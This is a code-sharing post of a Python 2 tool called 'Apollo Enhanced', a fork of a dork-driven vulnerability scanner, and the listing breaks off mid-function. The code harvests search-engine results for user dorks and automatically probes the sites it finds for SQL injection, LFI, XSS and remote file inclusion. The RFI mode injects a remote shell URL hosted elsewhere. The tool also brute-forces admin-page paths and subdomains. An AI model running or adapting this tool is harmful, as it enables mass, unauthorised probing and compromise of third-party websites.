Posted By


madfedora on 07/24/13

Tagged


Statistics


Viewed 785 times
Favorited by 0 user(s)

Apollo Enhanced


/ Published in: Python
Save to your folder(s)

This is a fork of the original project “Apollo” Python Vulnerability Scanner by Sotd. This fork version has majorly enhanced SQL and XSS dorking functions. Please do not rip either mine or Sotd codes, because if you do, KITTENS WILL DIE! Ahem…


Copy this code and paste it in your HTML
  1. #!/usr/bin/env python
  2. """
  3. Apollo.py - Python Vulnerability Scanner V1 -
  4. Written by Sotd - twitter.com/#!/Sotd_
  5.  
  6. Modified and fixed by madfedora
  7. """
  8. import re
  9. import hashlib
  10. import Queue
  11. from random import choice
  12. import threading
  13. import time
  14. import urllib2
  15. import sys
  16. import socket
  17.  
  18. USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
  19. "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
  20. "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  21. "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
  22. "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
  23. "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
  24. "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
  25. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sl-SI) AppleWebKit/533.24.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.24.1",
  26. "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/531.13.6",
  27. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1)"
  28. ]
  29. option = ' '
  30. vuln = 0
  31. invuln = 0
  32. np = 0
  33. found = []
  34.  
  35. class Crawl:
  36. """Searches for dorks and grabs results"""
  37. def __init__(self):
  38. if option == '4':
  39. self.shell = str(raw_input('Shell Location: '))
  40. self.dork = raw_input('Enter your dork: ')
  41. self.queue = Queue.Queue()
  42. self.pages = raw_input('How many pages (Max 80): ')
  43. self.qdork = urllib2.quote(self.dork)
  44. self.page = 1
  45. self.crawler()
  46.  
  47. def crawler(self):
  48. """Crawler"""
  49. print '\nDorking...'
  50. for i in range(int(self.pages)):
  51. host = "http://us.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
  52. req = urllib2.Request(host)
  53. req.add_header('User-Agent', choice(USER_AGENT))
  54. response = urllib2.urlopen(req)
  55. source = response.read()
  56. start = 0
  57. count = 1
  58. end = len(source)
  59. numlinks = source.count('_t" href', start, end)
  60.  
  61. while count < numlinks:
  62. start = source.find('_t" href', start, end)
  63. end = source.find(' onmousedown="return pk', start, end)
  64. link = source[start+10:end-1].replace("amp;","")
  65. self.queue.put(link)
  66. start = end
  67. end = len(source)
  68. count = count + 1
  69. self.page += 1
  70.  
  71. if option == '1':
  72. for i in range(10):
  73. thread = ScanClass(self.queue)
  74. thread.setDaemon(True)
  75. thread.start()
  76. self.queue.join()
  77.  
  78. elif option == '3':
  79. for i in range(10):
  80. thread = LScanClass(self.queue)
  81. thread.setDaemon(True)
  82. thread.start()
  83. self.queue.join()
  84.  
  85. elif option == '2':
  86. for i in range(10):
  87. thread = XScanClass(self.queue)
  88. thread.setDaemon(True)
  89. thread.start()
  90. self.queue.join()
  91.  
  92. elif option == '4':
  93. for i in range(10):
  94. thread = RScanClass(self.queue, self.shell)
  95. thread.setDaemon(True)
  96. thread.start()
  97. self.queue.join()
  98.  
  99.  
  100. class ScanClass(threading.Thread):
  101. """Scans for Sql errors and ouputs to file"""
  102. def __init__(self, queue):
  103. threading.Thread.__init__(self)
  104. self.queue = queue
  105. self.schar = "'"
  106. self.file = 'sqli-result.txt'
  107.  
  108. def run(self):
  109. """Scans Url for Sql errors"""
  110. while True:
  111. try:
  112. site = self.queue.get(False)
  113. except Queue.Empty:
  114. break
  115. if '=' in site:
  116. global vuln
  117. global invuln
  118. global np
  119. test = site + self.schar
  120.  
  121. try:
  122. conn = urllib2.Request(test)
  123. conn.add_header('User-Agent', choice(USER_AGENT))
  124. opener = urllib2.build_opener()
  125. data = opener.open(conn).read()
  126. except:
  127. self.queue.task_done()
  128. else:
  129. #===========================================================#
  130. # #
  131. # MySQL #
  132. # #
  133. #===========================================================#
  134. if (re.findall("You have an error in your SQL syntax", data, re.I)):
  135. self.mysql(test)
  136. vuln += 1
  137. elif (re.findall('Error:unknown', data, re.I)):
  138. self.mysql(test)
  139. vuln += 1
  140. elif (re.findall('mysql_fetch', data, re.I)):
  141. self.mysql(test)
  142. vuln += 1
  143. elif (re.findall('mysql_numrows', data, re.I)):
  144. self.mysql(test)
  145. vuln += 1
  146. elif (re.findall('mysql_num', data, re.I)):
  147. self.mysql(test)
  148. vuln += 1
  149. elif (re.findall('Invalid Query', data, re.I)):
  150. self.mysql(test)
  151. vuln += 1
  152. elif (re.findall('FetchRow', data, re.I)):
  153. self.mysql(test)
  154. vuln += 1
  155. elif (re.findall('GetArray', data, re.I)):
  156. self.mysql(test)
  157. vuln += 1
  158. elif (re.findall('SELECT statements have a different number of columns', data, re.I)):
  159. self.mysql(test)
  160. vuln += 1
  161. elif (re.findall('\' doesn\'t exist', data, re.I)):
  162. self.mysql(test)
  163. vuln += 1
  164. elif (re.findall('Unexpected EOF found when reading file', data, re.I)):
  165. self.mysql(test)
  166. vuln += 1
  167. elif (re.findall('Triggers can not be created on system tables', data, re.I)):
  168. self.mysql(test)
  169. vuln += 1
  170. #===========================================================#
  171. # #
  172. # MsSQL #
  173. # #
  174. #===========================================================#
  175. elif (re.findall('OLE DB Provider for SQL Server', data, re.I)):
  176. self.mssql(test)
  177. vuln += 1
  178. elif (re.findall('Unclosed quotation mark before the character string', data, re.I)):
  179. self.mssql(test)
  180. vuln += 1
  181. elif (re.findall('All queries in a SQL statement containing a UNION', data, re.I)):
  182. self.mssql(test)
  183. vuln += 1
  184. elif (re.findall('Syntax error converting the varchar value', data, re.I)):
  185. self.mssql(test)
  186. vuln += 1
  187. elif (re.findall('syntax near the keyword \'', data, re.I)):
  188. self.mssql(test)
  189. vuln += 1
  190. elif (re.findall('String or binary data would be truncated', data, re.I)):
  191. self.mssql(test)
  192. vuln += 1
  193. elif (re.findall('Invalid object name \'', data, re.I)):
  194. self.mssql(test)
  195. vuln += 1
  196. elif (re.findall('Incorrect syntax near', data, re.I)):
  197. self.mssql(test)
  198. vuln += 1
  199. #===========================================================#
  200. # #
  201. # Oracle #
  202. # #
  203. #===========================================================#
  204. elif (re.findall('oracle.jdbc.', data, re.I)):
  205. self.oracle(test)
  206. vuln += 1
  207. elif (re.findall('java.sql.sqlexception', data, re.I)):
  208. self.oracle(test)
  209. vuln += 1
  210. elif (re.findall('SQL command not properly ended', data, re.I)):
  211. self.oracle(test)
  212. vuln += 1
  213. elif (re.findall('quoted string not properly terminated', data, re.I)):
  214. self.oracle(test)
  215. vuln += 1
  216. elif (re.findall('wrong number or types of arguments in call to', data, re.I)):
  217. self.oracle(test)
  218. vuln += 1
  219. elif (re.findall('query block has incorrect number of result columns', data, re.I)):
  220. self.oracle(test)
  221. vuln += 1
  222. elif (re.findall('expression must have same datatype as correspoding expression', data, re.I)):
  223. self.oracle(test)
  224. vuln += 1
  225. elif (re.findall('ORA-01722:', data, re.I)):
  226. self.oracle(test)
  227. vuln += 1
  228. elif (re.findall('a non-numeric character was found where a numeric was expected', data, re.I)):
  229. self.oracle(test)
  230. vuln += 1
  231. elif (re.findall('FROM keyword not found where expected', data, re.I)):
  232. self.oracle(test)
  233. vuln += 1
  234. elif (re.findall('ORA-00936:', data, re.I)):
  235. self.oracle(test)
  236. vuln += 1
  237. elif (re.findall('ORA-00972:', data, re.I)):
  238. self.oracle(test)
  239. vuln += 1
  240. elif (re.findall('table or view does not exist', data, re.I)):
  241. self.oracle(test)
  242. vuln += 1
  243. elif (re.findall('Invalid relational operator', data, re.I)):
  244. self.oracle(test)
  245. vuln += 1
  246. elif (re.findall('missing right parenthesis', data, re.I)):
  247. self.oracle(test)
  248. vuln += 1
  249. elif (re.findall('ORA-00900:', data, re.I)):
  250. self.oracle(test)
  251. vuln += 1
  252. elif (re.findall('ORA-03001:', data, re.I)):
  253. self.oracle(test)
  254. vuln += 1
  255. elif (re.findall('can only select from fixed tables/views', data, re.I)):
  256. self.oracle(test)
  257. vuln += 1
  258. #===========================================================#
  259. # #
  260. # OLE DB #
  261. # #
  262. #===========================================================#
  263. elif (re.findall('system.data.oledb', data, re.I)):
  264. self.ole(test)
  265. vuln += 1
  266. elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
  267. self.ole(test)
  268. vuln += 1
  269. #===========================================================#
  270. # #
  271. # ODBC #
  272. # #
  273. #===========================================================#
  274. elif (re.findall('ODBC Microsoft Access Driver', data, re.I)):
  275. self.odbc(test)
  276. vuln += 1
  277. elif (re.findall('ODBC Microsoft Server Driver', data, re.I)):
  278. self.odbc(test)
  279. vuln += 1
  280. #===========================================================#
  281. # #
  282. # JET DB #
  283. # #
  284. #===========================================================#
  285. elif (re.findall('JET Database Engine', data, re.I)):
  286. self.jet(test)
  287. vuln += 1
  288. #===========================================================#
  289. # #
  290. # ADO DB #
  291. # #
  292. #===========================================================#
  293. elif (re.findall('ADODB.Field', data, re.I)):
  294. self.ado(test)
  295. vuln += 1
  296. elif (re.findall('ADODB.Command', data, re.I)):
  297. self.ado(test)
  298. vuln += 1
  299. elif (re.findall('BOF or EOF', data, re.I)):
  300. self.ado(test)
  301. vuln += 1
  302. #===========================================================#
  303. # #
  304. # PostgreSQL #
  305. # #
  306. #===========================================================#
  307. elif (re.findall('postgresql.util', data, re.I)):
  308. self.pgsql(test)
  309. vuln += 1
  310. elif (re.findall('ERROR: invalid input syntax for integer', data, re.I)):
  311. self.pgsql(test)
  312. vuln += 1
  313. elif (re.findall('null_value_eliminated_in_set_function', data, re.I)):
  314. self.pgsql(test)
  315. vuln += 1
  316. elif (re.findall('dynamic_result_sets_returned', data, re.I)):
  317. self.pgsql(test)
  318. vuln += 1
  319. elif (re.findall(': FATAL', data, re.I)):
  320. self.pgsql(test)
  321. vuln += 1
  322. elif (re.findall(': could not connect to server', data, re.I)):
  323. self.pgsql(test)
  324. vuln += 1
  325. #===========================================================#
  326. # #
  327. # Sybase #
  328. # #
  329. #===========================================================#
  330. elif (re.findall('Warning: sybase_query()', data, re.I)):
  331. self.sybase(test)
  332. vuln += 1
  333. elif (re.findall('sybase_fetch_assoc()', data, re.I)):
  334. self.sybase(test)
  335. vuln += 1
  336. #===========================================================#
  337. # #
  338. # Misc #
  339. # #
  340. #===========================================================#
  341. elif (re.findall('query failed:', data, re.I)):
  342. self.misc(test)
  343. vuln += 1
  344. else:
  345. print B+test+W+' <-- Not Vuln'
  346. invuln += 1
  347. else:
  348. print R+site+W+' <-- No Parameters'
  349. np += 1
  350. self.queue.task_done()
  351.  
  352.  
  353. def mysql(self, url):
  354. """Outputs"""
  355. read = open(self.file, "a+").read()
  356. if url in read:
  357. print G+'[DUPE] '+W+url
  358. else:
  359. print O+"[MySQL] " + url+W
  360. write = open(self.file, "a+")
  361. write.write('[MySQL] ' + url + "\n")
  362. write.close()
  363.  
  364. def mssql(self, url):
  365. """Outputs"""
  366. read = open(self.file, "a+").read()
  367. if url in read:
  368. print G+'[DUPE] ' + url+W
  369. else:
  370. print O+"[MsSQL] " + url+W
  371. write = open (self.file, "a+")
  372. write.write('[MsSQL] ' + url + "\n")
  373. write.close()
  374.  
  375. def oracle(self, url):
  376. """Outputs"""
  377. read = open(self.file, "a+").read()
  378. if url in read:
  379. print G+'[DUPE] ' + url+W
  380. else:
  381. print O+"[Oracle] " + url+W
  382. write = open (self.file, "a+")
  383. write.write('[Oracle] ' + url + "\n")
  384. write.close()
  385.  
  386. def ole(self, url):
  387. """Outputs"""
  388. read = open(self.file, "a+").read()
  389. if url in read:
  390. print G+'[DUPE] ' + url+W
  391. else:
  392. print O+"[OLE DB] " + url+W
  393. write = open (self.file, "a+")
  394. write.write('[OLE DB] ' + url + "\n")
  395. write.close()
  396.  
  397. def odbc(self, url):
  398. """Outputs"""
  399. read = open(self.file, "a+").read()
  400. if url in read:
  401. print G+'[DUPE] ' + url+W
  402. else:
  403. print O+"[ODBC] " + url+W
  404. write = open (self.file, "a+")
  405. write.write('[ODBC] ' + url + "\n")
  406. write.close()
  407.  
  408. def jet(self, url):
  409. """Outputs"""
  410. read = open(self.file, "a+").read()
  411. if url in read:
  412. print G+'[DUPE] ' + url+W
  413. else:
  414. print O+"[JET DB] " + url+W
  415. write = open (self.file, "a+")
  416. write.write('[JET DB] ' + url + "\n")
  417. write.close()
  418.  
  419. def ado(self, url):
  420. """Outputs"""
  421. read = open(self.file, "a+").read()
  422. if url in read:
  423. print G+'[DUPE] ' + url+W
  424. else:
  425. print O+"[ADO] " + url+W
  426. write = open (self.file, "a+")
  427. write.write('[ADO] ' + url + "\n")
  428. write.close()
  429.  
  430. def psql(self, url):
  431. """Outputs"""
  432. read = open(self.file, "a+").read()
  433. if url in read:
  434. print G+'[DUPE] ' + url+W
  435. else:
  436. print O+"[PGSQL] " + url+W
  437. write = open (self.file, "a+")
  438. write.write('[PGSQL] ' + url + "\n")
  439. write.close()
  440.  
  441. def sybase(self, url):
  442. """Outputs"""
  443. read = open(self.file, "a+").read()
  444. if url in read:
  445. print G+'[DUPE] ' + url+W
  446. else:
  447. print O+"[SYBASE] " + url+W
  448. write = open (self.file, "a+")
  449. write.write('[SYBASE] ' + url + "\n")
  450. write.close()
  451.  
  452. def misc(self, url):
  453. """Outputs"""
  454. read = open(self.file, "a+").read()
  455. if url in read:
  456. print G+'[DUPE] ' + url+W
  457. else:
  458. print O+"[Misc] " + url+W
  459. write = open (self.file, "a+")
  460. write.write('[Misc] ' + url + "\n")
  461. write.close()
  462.  
  463. class LScanClass(threading.Thread):
  464. """Scans for Lfi errors and outputs to file"""
  465. def __init__(self, queue):
  466. threading.Thread.__init__(self)
  467. self.file = 'lfi-result.txt'
  468. self.queue = queue
  469. self.lchar = '../'
  470.  
  471. def run(self):
  472. """Checks Url for File Inclusion errors"""
  473. while True:
  474. try:
  475. site = self.queue.get(False)
  476. except Queue.Empty:
  477. break
  478. if '=' in site:
  479. lsite = site.rsplit('=', 1)[0]
  480. if lsite[-1] != "=":
  481. lsite = lsite + "="
  482. test = lsite + self.lchar
  483. global vuln
  484. global invuln
  485. global np
  486.  
  487. try:
  488. conn = urllib2.Request(test)
  489. conn.add_header('User-Agent', choice(USER_AGENT))
  490. opener = urllib2.build_opener()
  491. data = opener.open(conn).read()
  492.  
  493. except:
  494. self.queue.task_done()
  495.  
  496. else:
  497. if (re.findall("failed to open stream: No such file or directory", data, re.I)):
  498. self.lfi(test)
  499. vuln += 1
  500. else:
  501. print B+test+W+' <-- Not Vuln'
  502. invuln += 1
  503. else:
  504. print R+site+W+' <-- No Parameters'
  505. np += 1
  506. self.queue.task_done()
  507.  
  508.  
  509. def lfi(self, url):
  510. """Outputs"""
  511. read = open(self.file, "a+").read()
  512. if url in read:
  513. print G+'[DUPE] ' + url+W
  514. else:
  515. print O+"[LFI] " + url+W
  516. write = open(self.file, "a+")
  517. write.write('[LFI] ' + url + "\n")
  518. write.close()
  519.  
  520.  
  521. class XScanClass(threading.Thread):
  522. """Scan for Xss errors and outputs to file"""
  523. def __init__(self, queue):
  524. threading.Thread.__init__(self)
  525. self.queue = queue
  526. self.xchar = """%3CScRIpT%3Ealert(%224p0ll0%22)%3C%2FScRiPt%3E"""
  527. self.file = 'xss-result.txt'
  528.  
  529. def run(self):
  530. """Checks Url for possible Xss"""
  531. while True:
  532. try:
  533. site = self.queue.get(False)
  534. except Queue.Empty:
  535. break
  536. if '=' in site:
  537. global vuln
  538. global invuln
  539. global np
  540. xsite = site.rsplit('=', 1)[0]
  541. if xsite[-1] != "=":
  542. xsite = xsite + "="
  543. test = xsite + self.xchar
  544. try:
  545. conn = urllib2.Request(test)
  546. conn.add_header('User-Agent', choice(USER_AGENT))
  547. opener = urllib2.build_opener()
  548. data = opener.open(conn).read()
  549. except:
  550. self.queue.task_done()
  551. else:
  552. if (re.findall("4p0ll0", data, re.I)):
  553. self.xss(test)
  554. vuln += 1
  555. else:
  556. print B+test+W+' <-- Not Vuln'
  557. invuln += 1
  558. else:
  559. print R+site+W+' <-- No Parameters'
  560. np += 1
  561. self.queue.task_done()
  562.  
  563. def xss(self, url):
  564. """Outputs"""
  565. read = open(self.file, "a+").read()
  566. if url in read:
  567. print G+'[DUPE] ' + url+W
  568. else:
  569. print O+"[XSS] " + url+W
  570. write = open(self.file, "a+")
  571. write.write('[XSS] ' + url + "\n")
  572. write.close()
  573.  
  574.  
  575. class RScanClass(threading.Thread):
  576. """Scans for Rfi errors and outputs to file"""
  577. def __init__(self, queue, shell):
  578. threading.Thread.__init__(self)
  579. self.queue = queue
  580. self.file = 'rfi-result.txt'
  581. self.shell = shell
  582.  
  583. def run(self):
  584. """Checks Url for Remote File Inclusion vulnerability"""
  585. while True:
  586. try:
  587. site = self.queue.get(False)
  588. except Queue.Empty:
  589. break
  590. if '=' in site:
  591. global vuln
  592. global invuln
  593. global np
  594. rsite = site.rsplit('=', 1)[0]
  595. if rsite[-1] != "=":
  596. rsite = rsite + "="
  597. link = rsite + self.shell + '?'
  598. try:
  599. conn = urllib2.Request(link)
  600. conn.add_header('User-Agent', choice(USER_AGENT))
  601. opener = urllib2.build_opener()
  602. data = opener.open(conn).read()
  603. except:
  604. self.queue.task_done()
  605. else:
  606. if (re.findall('uname -a', data, re.I)):
  607. self.rfi(link)
  608. vuln += 1
  609. else:
  610. print B+link+W+' <-- Not Vuln'
  611. invuln += 1
  612. else:
  613. print R+site+W+' <-- No Parameters'
  614. np += 1
  615. self.queue.task_done()
  616.  
  617. def rfi(self, url):
  618. """Outputs"""
  619. read = open(self.file, "a+").read()
  620. if url in read:
  621. print G+'[DUPE] ' + url+W
  622. else:
  623. print O+"[RFI] " + url+W
  624. write = open(self.file, "a+")
  625. write.write('[RFI] ' + url + "\n")
  626. write.close()
  627.  
  628.  
  629. class Atest(threading.Thread):
  630. """Checks given site for Admin Pages"""
  631. def __init__(self, queue):
  632. threading.Thread.__init__(self)
  633. self.queue = queue
  634.  
  635. def run(self):
  636. """Checks if Admin Page exists"""
  637. while True:
  638. try:
  639. site = self.queue.get(False)
  640.  
  641. except Queue.Empty:
  642. break
  643. try:
  644. conn = urllib2.Request(site)
  645. conn.add_header('User-Agent', choice(USER_AGENT))
  646. opener = urllib2.build_opener()
  647. opener.open(conn)
  648. print site
  649. found.append(site)
  650. self.queue.task_done()
  651.  
  652. except urllib2.URLError:
  653. self.queue.task_done()
  654.  
  655.  
  656. def admin():
  657. """Create queue and threads for admin page scans"""
  658. print 'Need to include http:// and ending /\n'
  659. site = raw_input('Site: ')
  660. queue = Queue.Queue()
  661. dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/',
  662. 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php',
  663. 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html',
  664. 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php',
  665. 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp',
  666. 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html',
  667. 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
  668. 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
  669. 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
  670. 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
  671. 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
  672. 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
  673. 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
  674. 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
  675. 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
  676. 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
  677. 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
  678. 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
  679. 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  680.  
  681. for add in dirs:
  682. test = site + add
  683. queue.put(test)
  684.  
  685. for i in range(20):
  686. thread = Atest(queue)
  687. thread.setDaemon(True)
  688. thread.start()
  689. queue.join()
  690.  
  691. def aprint():
  692. """Print results of admin page scans"""
  693. print 'Search Finished\n'
  694. if len(found) == 0:
  695. print '-[!]- No pages found'
  696. else:
  697. for site in found:
  698. print O+'-[!]- Found: ' + G+site+W
  699.  
  700.  
  701. class SDtest(threading.Thread):
  702. """Checks given Domain for Sub Domains"""
  703. def __init__(self, queue):
  704. threading.Thread.__init__(self)
  705. self.queue = queue
  706.  
  707. def run(self):
  708. """Checks if Sub Domain responds"""
  709. while True:
  710. try:
  711. domain = self.queue.get(False)
  712. except Queue.Empty:
  713. break
  714. try:
  715. site = domain
  716. conn = urllib2.Request(site)
  717. conn.add_header('User-Agent', choice(USER_AGENT))
  718. opener = urllib2.build_opener()
  719. opener.open(conn)
  720. except urllib2.URLError:
  721. self.queue.task_done()
  722. else:
  723. target = socket.gethostbyname(domain)
  724. print 'Found: ' + site + ' - ' + target
  725. self.queue.task_done()
  726.  
  727.  
  728. def subd():
  729. """Create queue and threads for sub domain scans"""
  730. queue = Queue.Queue()
  731. site = raw_input('Domain: ')
  732. sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca",
  733. "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro",
  734. "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana",
  735. "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange",
  736. "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
  737. "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d",
  738. "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
  739. "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere",
  740. "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
  741. "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping",
  742. "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads",
  743. "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
  744. "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]
  745.  
  746. for check in sub:
  747. test = check + '.' + site
  748. queue.put(test)
  749.  
  750. for i in range(20):
  751. thread = SDtest(queue)
  752. thread.setDaemon(True)
